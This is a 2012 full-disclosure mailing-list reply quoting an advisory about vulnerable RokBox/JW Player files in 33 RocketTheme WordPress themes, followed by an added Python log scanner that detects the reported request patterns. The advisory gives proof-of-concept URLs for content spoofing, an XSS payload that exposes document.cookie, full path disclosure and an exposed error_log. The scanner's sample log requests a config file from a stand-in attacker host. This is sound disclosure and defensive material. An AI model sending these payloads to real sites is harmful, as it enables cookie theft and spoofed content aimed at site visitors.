Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme themes for WordPress
- To: MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Multiple vulnerabilities in RocketTheme themes for WordPress
- From: Julius Kivimäki <julius.kivimaki@xxxxxxxxx>
- Date: Sun, 30 Dec 2012 00:54:43 +0200
Full path disclosure, vulnerability?
Ahahahahaha, good joke! You made my day.
2012/12/29 MustLive <mustlive@xxxxxxxxxxxxxxxxxx>
> Hello list!
>
> Earlier I wrote to the list about multiple vulnerabilities in multiple
> themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In
> that letter I mentioned 16 themes by RocketTheme (with Rokbox):
> Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse,
> Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx,
> Moxy, Terrantribune, Meridian.
>
> I wrote about 14 themes + 2 variations of 2 themes by these developers,
> but they have 47 themes for WordPress in total. Among them only three are
> free, and all other themes from RocketTheme are paid ones (it is necessary to
> buy a subscription to the club to receive access to them). And Rokbox is
> bundled with all these themes, except Grunge, which all have the
> earlier-mentioned vulnerabilities.
>
> So I inform you about multiple vulnerabilities in 33 new themes for
> WordPress, which are developed by RocketTheme (Rokbox's developers). These
> are Content Spoofing, Cross-Site Scripting, Full path disclosure and
> Information Leakage vulnerabilities.
>
> -------------------------
> Affected products:
> -------------------------
>
> In these 32 themes (in addition to the previous 16) there are Cross-Site
> Scripting, Content Spoofing, Full path disclosure and Information Leakage
> vulnerabilities. And the Grunge theme has FPD holes.
>
> These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere,
> Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex,
> Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox,
> Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline,
> Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge.
>
> All versions of these themes for WordPress are affected.
>
> Since August I've informed the developers many times concerning
> vulnerabilities in Rokbox and their themes with it.
>
> ----------
> Details:
> ----------
>
> Content Spoofing (WASC-12):
>
> In the parameter file, both video and audio files can be set.
>
> The swf-file of JW Player accepts arbitrary addresses in the parameters file and
> image, which allows spoofing the content of the flash - i.e. by setting addresses
> of video (audio) and/or image files from another site.
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
>
> Content Spoofing (WASC-12):
>
> The swf-file of JW Player accepts arbitrary addresses in the parameter config,
> which allows spoofing the content of the flash - i.e. by setting the address of a
> config file from another site (the parameters file and image in the xml-file accept
> arbitrary addresses). For loading a config file from another site, it needs to
> have crossdomain.xml.
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
>
> 1.xml
>
> <config>
> <file>1.flv</file>
> <image>1.jpg</image>
> </config>
>
> Content Spoofing (WASC-12):
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
>
> XSS (WASC-08):
>
>
> http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
>
> Full path disclosure (WASC-13):
>
> In all these themes there is FPD in index.php
> (http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for other
> themes), which works at default PHP settings. Also there is potentially FPD
> in other php-files of these themes.
>
> Information Leakage (WASC-13):
>
> In some themes, similar to rt_mixxmag_wp, there can be an error log with full
> paths.
>
> http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
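Detection logic for the request patterns the quoted advisory describes (off-site `file`/`image`/`config` values, a non-http `aboutlink`, and direct fetches of the RokBox `error_log`), as an added example that is not part of the original thread. The access-log lines are constructed, and the set of "own" hostnames is a hypothetical placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [29/Dec/2012:10:00:01 +0200] "GET /wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD4 HTTP/1.1" 200 51234
203.0.113.5 - - [29/Dec/2012:10:00:02 +0200] "GET /wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=http://evil.example/1.xml HTTP/1.1" 200 51234
203.0.113.5 - - [29/Dec/2012:10:00:03 +0200] "GET /wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log HTTP/1.1" 200 8812
198.51.100.7 - - [29/Dec/2012:10:00:04 +0200] "GET /wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=videos/intro.flv&image=videos/intro.jpg HTTP/1.1" 200 51234
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
OWN_HOSTS = {"site", "www.site"}  # hypothetical: hostnames that count as the site itself

def classify_request(target, own_hosts=OWN_HOSTS):
    """Return the advisory classes (WASC labels) a single request path+query matches."""
    parts = urlsplit(target)
    path, qs = parts.path, parse_qs(parts.query)
    findings = []
    if path.endswith("/rokbox/jwplayer/jwplayer.swf"):
        # aboutlink is rendered as a clickable link; anything but a plain web URL is suspect.
        for link in qs.get("aboutlink", []):
            if urlsplit(link).scheme not in ("", "http", "https"):
                findings.append("WASC-08 XSS via aboutlink")
        # Media/config parameters pointing at a foreign host let a third party supply content.
        for name in ("file", "image", "config"):
            for value in qs.get(name, []):
                host = urlsplit(value).netloc.split(":")[0]
                if host and host not in own_hosts:
                    findings.append(f"WASC-12 content spoofing via {name}")
    if path.endswith("/rokbox/error_log"):
        findings.append("WASC-13 information leakage (error_log)")
    return findings

def scan_log(text):
    """Return (ip, target, status, findings) for every log line with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m and (findings := classify_request(m["target"])):
            hits.append((m["ip"], m["target"], int(m["status"]), findings))
    return hits

if __name__ == "__main__":
    for ip, target, status, findings in scan_log(SAMPLE_LOG):
        print(ip, status, findings, target[:80])
```

A 200 status on an `error_log` hit means the file is actually being served, which is the condition the advisory's Information Leakage item depends on.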